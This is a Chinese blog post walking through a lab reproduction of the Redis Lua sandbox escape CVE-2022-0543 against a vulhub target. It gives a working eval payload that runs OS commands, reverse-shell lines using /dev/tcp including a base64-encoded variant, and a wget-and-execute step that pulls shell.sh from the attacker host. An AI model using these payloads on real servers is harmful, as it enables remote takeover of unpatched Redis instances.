Redis沙盒逃逸漏洞 RCE(CVE-2022-0543)复现+getshell

最新推荐文章于 2024-05-28 15:44:55 发布
最新推荐文章于 2024-05-28 15:44:55 发布
阅读量966 收藏 1
点赞数
文章标签: redis lua 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaobai_20190815/article/details/129419779
版权

一、漏洞成因

        Redis一直有一个攻击点,就是在用户连接redis后,可以通过eval命令执行lua脚本,但这个脚本跑在沙箱里,正常情况下无法执行命令,读取文件。Debian以及Ubuntu发行版的源在打包Redis时,在Lua沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令(同时利用该漏洞需要具备可在Redis中执行eval命令的权限)

二、影响版本

仅为运行在 Debian、Ubuntu 或其他基于 Debian 的 Linux 发行版系统上的 以下Redis 服务。

 2.2 <= redis < 5.0.13

 2.2 <= redis < 6.0.15

 2.2 <= redis < 6.2.5

三、漏洞环境

vulhub

四、漏洞复现

靶机:192.168.154.128

攻击机:192.168.200.185

1、下载redis-cli工具,连接靶机:redis-cli.exe -h 192.168.154.128(靶机) -p 6379(redis默认端口)

windows:https://github.com/microsoftarchive/redis/releases 选择zip文件

Linux:https://download.redis.io/releases 选择zip文件

2、执行payload

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("whoami", "r"); local res = f:read("*a"); f:close(); return res' 0

当前主机为root权限:

 3、漏洞利用,获取shell

开启监听nc -lvvp 1234

 

尝试反弹失败

bash -i >& /dev/tcp/192.168.200.185/1234 0>&1

编码再次尝试,失败

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwMC4xODUvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}

尝试本地起服务,下载至服务器(迂回战术)

分三次执行第二部分的payload,并将whoami替换为下面的命令

wget -P /tmp http://192.168.200.185/shell.sh #将反弹命令写入/tmp/shell.sh文件

chmod +x /tmp/shell.sh #赋予可执行权限

bash /tmp/shell.sh #执行该文件

监听成功

 

whatever`
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2022-0543Redis 沙盒逃逸漏洞
Battery的博客
11-23 8万+
CVE-2022-0543是一个与Redis相关的安全漏洞。在Redis中,用户连接后可以通过eval命令执行Lua脚本,但在沙箱环境中脚本无法执行命令或读取文件。然而,攻击者可以利用Lua沙箱中遗留的变量package的loadlib函数来加载动态链接库liblua5.1.so.0里的导出函数luaopen_io,从而获得io库并执行命令。为了利用这个漏洞,攻击者需要在Redis客户端中输入恶意payload,其中whoami是要执行的命令,也可以根据需求更换其他命令。
CVE-2022-0543 Redis沙盒逃逸漏洞
weixin_45715461的博客
07-01 3536
CVE-2022-0543 Redis沙盒逃逸漏洞
Redis漏洞总结
最新发布
白帽子佳奇的博客
05-28 918
redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同方式的排序。与memcached一样,为了保证效率,数据都是缓存在内存中。
Redis进行RCE利用总结
weixin_50464560的博客
11-07 1912
百度百科:Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。连接到redis,输入以下指令利用crontab反弹shellRedis因配置不当可导致攻击者直接获取到服务器的权限。倘若服务器运行着LAMP/LNMP服务,且已知工作目录为。kali中打开一个新的命令行窗口执行。
Redis主从复制实现RCE
rev1ve的博客
12-01 2219
主从复制是指将一台Redis主服务器的数据,复制到其他的Redis从服务器。前者称为主节点(master),后者称为从节点(slave);主服务器可以进行读写操作,当发生写操作时自动将写操作同步给从服务器,而从服务器一般是只读,并接受主服务器同步过来写操作命令,然后执行这条命令。 也就是说,所有的数据修改只在主服务器上进行,然后将最新的数据同步给从服务器,这样就使得主从服务器的数据是一致的。建立主从复制,有3种方式:PS:建立主从关系只需要在从节点操作就行了,主节点不用任何操作我们先在同一个机器开两个red
红队攻防实战之Redis-RCE集锦
自强不息
12-08 643
心若有所向往,何惧道阻且长
CVE-2022-0543 Redis Lua 沙盒逃逸 RCE | 附检测工具
dust_hk的博客
03-21 4540
CVE-2022-0543 Redis Lua 沙盒逃逸 RCE 摘要 Redis是一种非常广泛使用的缓存服务,但它也被用作消息代理。客户端通过套接字与 Redis 服务器通信,发送命令,服务器更改其状态(即其内存结构)以响应此类命令。Redis 嵌入了 Lua 编程语言作为其脚本引擎,可通过eval命令使用。Lua 引擎应该是沙盒化的,即客户端可以与 Lua 中的 Redis API 交互,但不能在运行 Redis 的机器上执行任意代码。Debian以及Ubuntu发行版的源在打包Redis时...
WIndows Redis可视化工具:resp-2022.1.0.0 GUI
02-17
**Redis可视化工具RESP 2022.1.0.0 GUI详解** Redis,全名Remote Dictionary Server,是一款开源、高性能、支持网络、基于键值对的数据存储系统。在开发和运维过程中,为了方便地管理和操作Redis服务器,可视化工具...
redis-plus-plus:用C ++编写的Redis客户端
01-28
**redis-plus-plus** 是一个基于C++编写的高效、易用的Redis客户端库,它为开发者提供了方便的接口,使得在C++应用中操作Redis数据库变得更加简单。这个库充分利用了C++11特性,提供了现代C++编程风格的API,提高了...
Springboot+Mybatis-plus+ SpringMvc+Shiro+Redis企业级报表后台管理系统.rar
08-12
运行环境 jdk8+oracle+redis+IntelliJ IDEA+maven 项目技术(必填) Springboot+Mybatis-plus+ SpringMvc+Shiro+Redis 数据库文件 压缩包内 jar包文件 maven搭建 Springboot+Mybatis-plus+ SpringMvc+Shiro+Redis企业...
redis-stack-server 7.2.0 安装包合集
04-03
redis-stack-server-7.2.0-v9.arm64.snap redis-stack-server-7.2.0-v9.bionic.arm64.tar.gz redis-stack-server-7.2.0-v9.bionic.x86_64.tar.gz redis-stack-server-7.2.0-v9.bullseye.x86_64.tar.gz redis-stack-...
CVE-2022-0543redis沙盒逃逸
huayimy的博客
02-03 876
CVE-2022-0543redis沙盒逃逸借助Lua沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。Redis Labs Redis是美国Redis Labs公司的一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值(Key-Value)存储数据库,并提供多种语言的API。运行完docker-compose后,打开我们的redis就是我们的漏洞环境啦
redis主从复制
weixin_63231007的博客
02-28 1708
redis主从复制原理以及简单演示(环境真难搭)
CVE-2022-0543 Redis Lua沙盒绕过 命令执行
Foreverlove112的博客
09-22 502
CVE-2022-0543 Redis Lua沙盒绕过 命令执行
Redis沙盒逃逸漏洞(CVE-2022-0543)复现以及流量特征分析
xhscxj的博客
02-03 1854
Redis Labs Redis是美国Redis Labs公司的一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值(Key-Value)存储数据库,并提供多种语言的API。Redis 存在代码注入漏洞,攻击者可利用该漏洞远程执行代码。Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。
CVE-2022-0543
sinat_25635183的博客
03-25 326
2、CVE-2022-0543Redis沙盒逃逸漏洞Redis Labs 是一家专注于 Redis 数据库的企业公司,提供企业级的 Redis 产品和服务。出现一个新的网页,直接跳转到iana的官网(IANA(Internet Assigned Numbers Authority)是互联网分配号码局,是负责管理全球互联网协议参数的权威组织之一。根据前面的增加链接内容的操作,可以尝试一下将iana网站的链接加在靶场链接的后面。注意:每个人可能打开的网页链接不一样,需要根据自己的情况来操作后面的步骤。
一文清晰带你认识redis漏洞
逍遥小哥的博客
02-01 1455
主从模式指使用一个redis作为主机,其他的作为备份机,主机从机数据都是一样的,从机只负责读,主机只负责写。在Reids 4.x之后,通过外部拓展,可以实现在redis中实现一个新的Redis命令,构造恶意.so文件。数据持久化:Redis提供持久化功能,可以将数据保存到磁盘上,以防止数据丢失。Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。
CVE-2022-0543 Redis沙盒逃逸漏洞复现(CVE-2022-0543)
XZ_______的博客
04-21 978
漏洞复现
spring-boot-starter-redis + redisson-spring-boot-starter + springboot 3.1 配置
05-26
在 Spring Boot 3.1 中,可以通过以下步骤配置 Redis: 1. 在 `pom.xml` 中添加 `spring-boot-starter-redis` 和 `redisson-spring-boot-starter` 依赖: ```xml <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-redis</artifactId> </dependency> <dependency> <groupId>org.redisson</groupId> <artifactId>redisson-spring-boot-starter</artifactId> <version>3.15.5</version> </dependency> ``` 2. 在 `application.properties` 中配置 Redis 连接信息: ```properties spring.redis.host=127.0.0.1 spring.redis.port=6379 spring.redis.password= spring.redis.database=0 # Redisson 配置 spring.redisson.config=classpath:redisson.yaml ``` 3. 创建 `redisson.yaml` 配置文件,配置 Redisson 的相关信息: ```yaml singleServerConfig: address: "redis://${spring.redis.host}:${spring.redis.port}" password: ${spring.redis.password} database: ${spring.redis.database} ``` 4. 在代码中使用 Redis: ```java @Autowired private RedisTemplate<String, Object> redisTemplate; // 向 Redis 中存储数据 redisTemplate.opsForValue().set("key", "value"); // 从 Redis 中获取数据 Object value = redisTemplate.opsForValue().get("key"); ``` 以上是 Spring Boot 3.1 中使用 Redis 的基本配置和使用方法,可以根据实际情况进行调整。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值